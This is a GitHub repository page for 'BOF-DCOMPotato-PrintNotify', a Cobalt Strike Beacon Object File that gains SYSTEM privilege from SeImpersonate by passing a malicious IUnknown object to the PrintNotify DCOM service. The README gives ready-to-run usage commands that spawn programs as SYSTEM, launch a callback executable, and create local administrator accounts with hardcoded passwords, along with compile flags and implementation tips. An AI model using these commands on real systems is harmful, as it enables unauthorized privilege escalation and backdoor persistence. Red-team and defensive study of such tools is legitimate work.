Skip to content

Cobalt Strike Beacon Object File (BOF) that obtain SYSTEM privilege with SeImpersonate privilege by passing a malicious IUnknwon object to DCOM call of PrintNotify.

Notifications You must be signed in to change notification settings

Hagrid29/BOF-DCOMPotato-PrintNotify

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

4 Commits
 
 
 
 
 
 
 
 
 
 
 
 
 
 

Repository files navigation

BOF - DCOMPotato - PrintNotify

BOF version of DCOMPotato. Obtain SYSTEM privilege with SeImpersonate privilege by passing a malicious IUnknwon object to DCOM call of PrintNotify.

By default, ImpersonationLevel of PrintNotify service, which was run as SYSTEM, set as RPC_C_IMP_LEVEL_IMPERSONATE

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Svchost\print

Usage

--pprog : program to launch. Default cmd.exe
--pargs : command line argument to pass to program. Default NULL
--pmode : create process call. 1 for CreateProcessWithTokenW. 2 for CreateProcessAsUser. 3 for NetUserAdd. Default 1

execute command with CreateProcessWithTokenW

DCOMPotato --pargs /c whoami /all > C:\temp\whoami.txt

execute command with CreateProcessAsUser

DCOMPotato --pargs /c net user hagrid P@ssw0rd /add --pmode 2

execute program with CreateProcessWithTokenW

DCOMPotato --pprog C:\temp\callback.exe

create local administrator account (hagrid\P@ss@29hagr!d) with NetUserAdd

DCOMPotato --pmode 3

Compile

cl /c /GS- /FoDCOMPotato.x64.o /TP DCOMPotato.cpp

Take Away

  • You cannot create new object with C++ in Cobalt Strike when loading BOF. You can use struct to implement COM in C instead. Here is a guide
  • == sign could be overloaded. It was overloaded as IsEqualGUID in my case
  • Using flag LOGON_TYPE_NEW_CREDENTIALS can create a token that can be used for impersonate from LogonUser without providing valid credential
  • According to the document, a process that calls CreateProcessAsUser require SE_INCREASE_QUOTA_NAME and SE_ASSIGNPRIMARYTOKEN_NAME privilege.

References

About

Cobalt Strike Beacon Object File (BOF) that obtain SYSTEM privilege with SeImpersonate privilege by passing a malicious IUnknwon object to DCOM call of PrintNotify.

Resources

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published